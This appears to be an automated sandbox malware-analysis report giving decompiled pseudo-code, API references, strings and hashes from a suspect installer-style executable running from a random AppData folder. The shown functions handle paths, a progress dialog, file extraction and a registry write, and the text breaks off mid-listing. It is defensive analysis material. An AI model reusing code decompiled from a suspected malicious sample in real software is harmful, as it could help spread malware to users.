                          0x00405af8
                          0x00405afe
                          0x00000000
                          0x00000000
                          0x00405b04
                          0x00405b05
                          0x00405b08
                          0x00405b0b
                          0x00405cb3
                          0x00405cbd
                          0x00405cbf
                          0x00405cbf
                          0x00405cb5
                          0x00405cb7
                          0x00405cb9
                          0x00405cba
                          0x00405cba
                          0x00000000
                          0x00405cb3
                          0x00405b11
                          0x00405b15
                          0x00405b1a
                          0x00405b29
                          0x00405b2c
                          0x00405b2e
                          0x00405b33
                          0x00405b36
                          0x00405b39
                          0x00405b3c
                          0x00405b3f
                          0x00405b42
                          0x00405c5d
                          0x00405c60
                          0x00405c90
                          0x00405c93
                          0x00405c98
                          0x00405c9c
                          0x00405c9c
                          0x00405ca1
                          0x00405ca2
                          0x00405ca7
                          0x00405caa
                          0x00405cac
                          0x00000000
                          0x00405cac
                          0x00405c62
                          0x00405c65
                          0x00405c7a
                          0x00405c81
                          0x00405c67
                          0x00405c6e
                          0x00405c6e
                          0x00405c89
                          0x00405c8c
                          0x00405c55
                          0x00405c56
                          0x00405c56
                          0x00000000
                          0x00405c8c
                          0x00405b4a
                          0x00405b4b
                          0x00405b51
                          0x00405b53
                          0x00405b6d
                          0x00405b6d
                          0x00405b74
                          0x00405b74
                          0x00405b7b
                          0x00405b7f
                          0x00405b7f
                          0x00405b80
                          0x00405b82
                          0x00405bbb
                          0x00405bbe
                          0x00405bce
                          0x00405bd1
                          0x00405bd9
                          0x00405bdf
                          0x00405bdf
                          0x00405c3b
                          0x00405c3b
                          0x00405c3d
                          0x00000000
                          0x00000000
                          0x00405be3
                          0x00405bea
                          0x00405beb
                          0x00405bed
                          0x00405c07
                          0x00405c15
                          0x00405c1b
                          0x00405c1d
                          0x00405c38
                          0x00405c38
                          0x00405c38
                          0x00000000
                          0x00405c38
                          0x00405c23
                          0x00405c2e
                          0x00405c34
                          0x00405c36
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c36
                          0x00405bef
                          0x00405bf2
                          0x00000000
                          0x00000000
                          0x00405c01
                          0x00405c03
                          0x00405c05
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c05
                          0x00000000
                          0x00405c3b
                          0x00405bc6
                          0x00000000
                          0x00405b84
                          0x00405b89
                          0x00405b9f
                          0x00405ba4
                          0x00405ba7
                          0x00405c44
                          0x00405c44
                          0x00405c48
                          0x00405c50
                          0x00405c50
                          0x00000000
                          0x00405c48
                          0x00405bb1
                          0x00405c3f
                          0x00405c3f
                          0x00405c42
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c42
                          0x00405b82
                          0x00405b55
                          0x00405b59
                          0x00000000
                          0x00000000
                          0x00405b5b
                          0x00405b5f
                          0x00000000
                          0x00000000
                          0x00405b61
                          0x00405b65
                          0x00000000
                          0x00405b67
                          0x00405b67
                          0x00000000
                          0x00405b67
                          0x00405b65
                          0x00405cca
                          0x00405cd4
                          0x00405ce0
                          0x00405ce0
                          0x00000000

                          APIs
                          • GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                          • GetSystemDirectoryA.KERNEL32(xzfdi,00000400), ref: 00405BC6
                          • GetWindowsDirectoryA.KERNEL32(xzfdi,00000400), ref: 00405BD9
                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                          • SHGetPathFromIDListA.SHELL32(00000000,xzfdi), ref: 00405C23
                          • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                          • lstrcatA.KERNEL32(xzfdi,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                          • lstrlenA.KERNEL32(xzfdi,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$xzfdi
                          • API String ID: 900638850-1289049640
                          • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                          • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                          • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                          • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405CE3(CHAR* _a4) {
                          				char _t5;
                          				char _t7;
                          				char* _t15;
                          				char* _t16;
                          				CHAR* _t17;
                          
                          				_t17 = _a4;
                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                          					_t17 =  &(_t17[4]);
                          				}
                          				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                          					_t17 =  &(_t17[2]);
                          				}
                          				_t5 =  *_t17;
                          				_t15 = _t17;
                          				_t16 = _t17;
                          				if(_t5 != 0) {
                          					do {
                          						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                          							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                          							_t16 = CharNextA(_t16);
                          						}
                          						_t17 = CharNextA(_t17);
                          						_t5 =  *_t17;
                          					} while (_t5 != 0);
                          				}
                          				 *_t16 =  *_t16 & 0x00000000;
                          				while(1) {
                          					_t16 = CharPrevA(_t15, _t16);
                          					_t7 =  *_t16;
                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                          						break;
                          					}
                          					 *_t16 =  *_t16 & 0x00000000;
                          					if(_t15 < _t16) {
                          						continue;
                          					}
                          					break;
                          				}
                          				return _t7;
                          			}








                          0x00405ce5
                          0x00405ced
                          0x00405d01
                          0x00405d01
                          0x00405d07
                          0x00405d14
                          0x00405d14
                          0x00405d15
                          0x00405d17
                          0x00405d1b
                          0x00405d1d
                          0x00405d26
                          0x00405d28
                          0x00405d42
                          0x00405d4a
                          0x00405d4a
                          0x00405d4f
                          0x00405d51
                          0x00405d53
                          0x00405d57
                          0x00405d58
                          0x00405d5b
                          0x00405d63
                          0x00405d65
                          0x00405d69
                          0x00000000
                          0x00000000
                          0x00405d6f
                          0x00405d74
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405d74
                          0x00405d79

                          APIs
                          • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                          • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                          • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                          • CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                          Strings
                          • *?|<>/":, xrefs: 00405D2B
                          • "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" , xrefs: 00405CE9
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-1551715608
                          • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                          • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                          • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                          • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                          				char _v68;
                          				void* _t11;
                          				CHAR* _t19;
                          
                          				if(_a8 == 0x110) {
                          					SetTimer(_a4, 1, 0xfa, 0);
                          					_a8 = 0x113;
                          				}
                          				if(_a8 == 0x113) {
                          					_t11 = E00402BA9();
                          					_t19 = "unpacking data: %d%%";
                          					if( *0x423eb0 == 0) {
                          						_t19 = "verifying installer: %d%%";
                          					}
                          					wsprintfA( &_v68, _t19, _t11);
                          					SetWindowTextA(_a4,  &_v68);
                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                          				}
                          				return 0;
                          			}






                          0x00402b3a
                          0x00402b48
                          0x00402b4e
                          0x00402b4e
                          0x00402b5c
                          0x00402b5e
                          0x00402b6a
                          0x00402b6f
                          0x00402b71
                          0x00402b71
                          0x00402b7c
                          0x00402b8c
                          0x00402b9e
                          0x00402b9e
                          0x00402ba6

                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                          • wsprintfA.USER32 ref: 00402B7C
                          • SetWindowTextA.USER32(?,?), ref: 00402B8C
                          • SetDlgItemTextA.USER32 ref: 00402B9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: p>u$unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-4167347466
                          • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                          • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                          • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                          • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                          				struct tagLOGBRUSH _v16;
                          				long _t35;
                          				long _t37;
                          				void* _t40;
                          				long* _t49;
                          
                          				if(_a4 + 0xfffffecd > 5) {
                          					L15:
                          					return 0;
                          				}
                          				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                          				if(_t49 == 0) {
                          					goto L15;
                          				}
                          				_t35 =  *_t49;
                          				if((_t49[5] & 0x00000002) != 0) {
                          					_t35 = GetSysColor(_t35);
                          				}
                          				if((_t49[5] & 0x00000001) != 0) {
                          					SetTextColor(_a8, _t35);
                          				}
                          				SetBkMode(_a8, _t49[4]);
                          				_t37 = _t49[1];
                          				_v16.lbColor = _t37;
                          				if((_t49[5] & 0x00000008) != 0) {
                          					_t37 = GetSysColor(_t37);
                          					_v16.lbColor = _t37;
                          				}
                          				if((_t49[5] & 0x00000004) != 0) {
                          					SetBkColor(_a8, _t37);
                          				}
                          				if((_t49[5] & 0x00000010) != 0) {
                          					_v16.lbStyle = _t49[2];
                          					_t40 = _t49[3];
                          					if(_t40 != 0) {
                          						DeleteObject(_t40);
                          					}
                          					_t49[3] = CreateBrushIndirect( &_v16);
                          				}
                          				return _t49[3];
                          			}








                          0x00403eb0
                          0x00403f44
                          0x00000000
                          0x00403f44
                          0x00403ec1
                          0x00403ec5
                          0x00000000
                          0x00000000
                          0x00403ecb
                          0x00403ed4
                          0x00403ed7
                          0x00403ed7
                          0x00403edd
                          0x00403ee3
                          0x00403ee3
                          0x00403eef
                          0x00403ef5
                          0x00403efc
                          0x00403eff
                          0x00403f02
                          0x00403f04
                          0x00403f04
                          0x00403f0c
                          0x00403f12
                          0x00403f12
                          0x00403f1c
                          0x00403f21
                          0x00403f24
                          0x00403f29
                          0x00403f2c
                          0x00403f2c
                          0x00403f3c
                          0x00403f3c
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                          • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                          • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                          • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E0040266E(struct _OVERLAPPED* __ebx) {
                          				void* _t27;
                          				long _t32;
                          				struct _OVERLAPPED* _t47;
                          				void* _t51;
                          				void* _t53;
                          				void* _t56;
                          				void* _t57;
                          				void* _t58;
                          
                          				_t47 = __ebx;
                          				 *(_t58 - 8) = 0xfffffd66;
                          				_t52 = E004029E8(0xfffffff0);
                          				 *(_t58 - 0x44) = _t24;
                          				if(E004055E5(_t52) == 0) {
                          					E004029E8(0xffffffed);
                          				}
                          				E0040573D(_t52);
                          				_t27 = E0040575C(_t52, 0x40000000, 2);
                          				 *(_t58 + 8) = _t27;
                          				if(_t27 != 0xffffffff) {
                          					_t32 =  *0x423eb4; // 0xb600
                          					 *(_t58 - 0x2c) = _t32;
                          					_t51 = GlobalAlloc(0x40, _t32);
                          					if(_t51 != _t47) {
                          						E004031DA(_t47);
                          						E004031A8(_t51,  *(_t58 - 0x2c));
                          						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                          						 *(_t58 - 0x30) = _t56;
                          						if(_t56 != _t47) {
                          							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                          							while( *_t56 != _t47) {
                          								_t49 =  *_t56;
                          								_t57 = _t56 + 8;
                          								 *(_t58 - 0x38) =  *_t56;
                          								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                          								_t56 = _t57 +  *(_t58 - 0x38);
                          							}
                          							GlobalFree( *(_t58 - 0x30));
                          						}
                          						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                          						GlobalFree(_t51);
                          						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                          					}
                          					CloseHandle( *(_t58 + 8));
                          				}
                          				_t53 = 0xfffffff3;
                          				if( *(_t58 - 8) < _t47) {
                          					_t53 = 0xffffffef;
                          					DeleteFileA( *(_t58 - 0x44));
                          					 *((intOrPtr*)(_t58 - 4)) = 1;
                          				}
                          				_push(_t53);
                          				E00401423();
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                          				return 0;
                          			}











                          0x0040266e
                          0x00402670
                          0x0040267c
                          0x0040267f
                          0x00402689
                          0x0040268d
                          0x0040268d
                          0x00402693
                          0x004026a0
                          0x004026a8
                          0x004026ab
                          0x004026b1
                          0x004026bf
                          0x004026c4
                          0x004026c8
                          0x004026cb
                          0x004026d4
                          0x004026e0
                          0x004026e4
                          0x004026e7
                          0x004026f1
                          0x00402710
                          0x004026f8
                          0x004026fd
                          0x00402705
                          0x00402708
                          0x0040270d
                          0x0040270d
                          0x00402717
                          0x00402717
                          0x00402729
                          0x00402730
                          0x00402742
                          0x00402742
                          0x00402748
                          0x00402748
                          0x00402753
                          0x00402754
                          0x00402758
                          0x0040275c
                          0x00402762
                          0x00402762
                          0x00402769
                          0x00402156
                          0x00402880
                          0x0040288c

                          APIs
                          • GlobalAlloc.KERNEL32(00000040,0000B600,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                          • GlobalFree.KERNEL32 ref: 00402717
                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                          • GlobalFree.KERNEL32 ref: 00402730
                          • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                          • String ID:
                          • API String ID: 3294113728-0
                          • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                          • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                          • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                          • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404E23(CHAR* _a4, CHAR* _a8) {
                          				struct HWND__* _v8;
                          				signed int _v12;
                          				CHAR* _v32;
                          				long _v44;
                          				int _v48;
                          				void* _v52;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				CHAR* _t26;
                          				signed int _t27;
                          				CHAR* _t28;
                          				long _t29;
                          				signed int _t39;
                          
                          				_t26 =  *0x423684; // 0x0
                          				_v8 = _t26;
                          				if(_t26 != 0) {
                          					_t27 =  *0x423f54; // 0x0
                          					_v12 = _t27;
                          					_t39 = _t27 & 0x00000001;
                          					if(_t39 == 0) {
                          						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                          					}
                          					_t26 = lstrlenA(0x41fc70);
                          					_a4 = _t26;
                          					if(_a8 == 0) {
                          						L6:
                          						if((_v12 & 0x00000004) == 0) {
                          							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                          						}
                          						if((_v12 & 0x00000002) == 0) {
                          							_v32 = 0x41fc70;
                          							_v52 = 1;
                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                          							_v44 = 0;
                          							_v48 = _t29 - _t39;
                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                          						}
                          						if(_t39 != 0) {
                          							_t28 = _a4;
                          							 *((char*)(_t28 + 0x41fc70)) = 0;
                          							return _t28;
                          						}
                          					} else {
                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                          						if(_t26 < 0x800) {
                          							_t26 = lstrcatA(0x41fc70, _a8);
                          							goto L6;
                          						}
                          					}
                          				}
                          				return _t26;
                          			}

















                          0x00404e29
                          0x00404e35
                          0x00404e38
                          0x00404e3e
                          0x00404e4a
                          0x00404e4d
                          0x00404e50
                          0x00404e56
                          0x00404e56
                          0x00404e5c
                          0x00404e64
                          0x00404e67
                          0x00404e84
                          0x00404e88
                          0x00404e91
                          0x00404e91
                          0x00404e9b
                          0x00404ea4
                          0x00404eb0
                          0x00404eb7
                          0x00404ebb
                          0x00404ebe
                          0x00404ed1
                          0x00404edf
                          0x00404edf
                          0x00404ee3
                          0x00404ee5
                          0x00404ee8
                          0x00000000
                          0x00404ee8
                          0x00404e69
                          0x00404e71
                          0x00404e79
                          0x00404e7f
                          0x00000000
                          0x00404e7f
                          0x00404e79
                          0x00404e67
                          0x00404ef2

                          APIs
                          • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                          • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                          • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                          • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                          • SendMessageA.USER32 ref: 00404EB7
                          • SendMessageA.USER32 ref: 00404ED1
                          • SendMessageA.USER32 ref: 00404EDF
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID:
                          • API String ID: 2531174081-0
                          • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                          • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                          • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                          • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                          				long _v8;
                          				signed char _v12;
                          				unsigned int _v16;
                          				void* _v20;
                          				intOrPtr _v24;
                          				long _v56;
                          				void* _v60;
                          				long _t15;
                          				unsigned int _t19;
                          				signed int _t25;
                          				struct HWND__* _t28;
                          
                          				_t28 = _a4;
                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                          				if(_a8 == 0) {
                          					L4:
                          					_v56 = _t15;
                          					_v60 = 4;
                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                          					return _v24;
                          				}
                          				_t19 = GetMessagePos();
                          				_v16 = _t19 >> 0x10;
                          				_v20 = _t19;
                          				ScreenToClient(_t28,  &_v20);
                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                          				if((_v12 & 0x00000066) != 0) {
                          					_t15 = _v8;
                          					goto L4;
                          				}
                          				return _t25 | 0xffffffff;
                          			}














                          0x00404700
                          0x0040470d
                          0x00404713
                          0x00404751
                          0x00404751
                          0x00404760
                          0x00404767
                          0x00000000
                          0x00404769
                          0x00404715
                          0x00404724
                          0x0040472c
                          0x0040472f
                          0x00404741
                          0x00404747
                          0x0040474e
                          0x00000000
                          0x0040474e
                          0x00000000

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                          • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                          • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                          • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E004022F5(void* __eax) {
                          				void* _t15;
                          				char* _t18;
                          				int _t19;
                          				char _t24;
                          				int _t27;
                          				signed int _t30;
                          				intOrPtr _t35;
                          				void* _t37;
                          
                          				_t15 = E00402ADD(__eax);
                          				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                          				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                          				 *(_t37 - 0x44) = E004029E8(2);
                          				_t18 = E004029E8(0x11);
                          				_t30 =  *0x423f50; // 0x0
                          				_t31 = _t30 | 0x00000002;
                          				 *(_t37 - 4) = 1;
                          				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                          				if(_t19 == 0) {
                          					if(_t35 == 1) {
                          						E004029E8(0x23);
                          						_t19 = lstrlenA(0x40a368) + 1;
                          					}
                          					if(_t35 == 4) {
                          						_t24 = E004029CB(3);
                          						 *0x40a368 = _t24;
                          						_t19 = _t35;
                          					}
                          					if(_t35 == 3) {
                          						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                          					}
                          					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                          						 *(_t37 - 4) = _t27;
                          					}
                          					_push( *(_t37 + 8));
                          					RegCloseKey();
                          				}
                          				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                          				return 0;
                          			}











                          0x004022f6
                          0x004022fb
                          0x00402305
                          0x0040230f
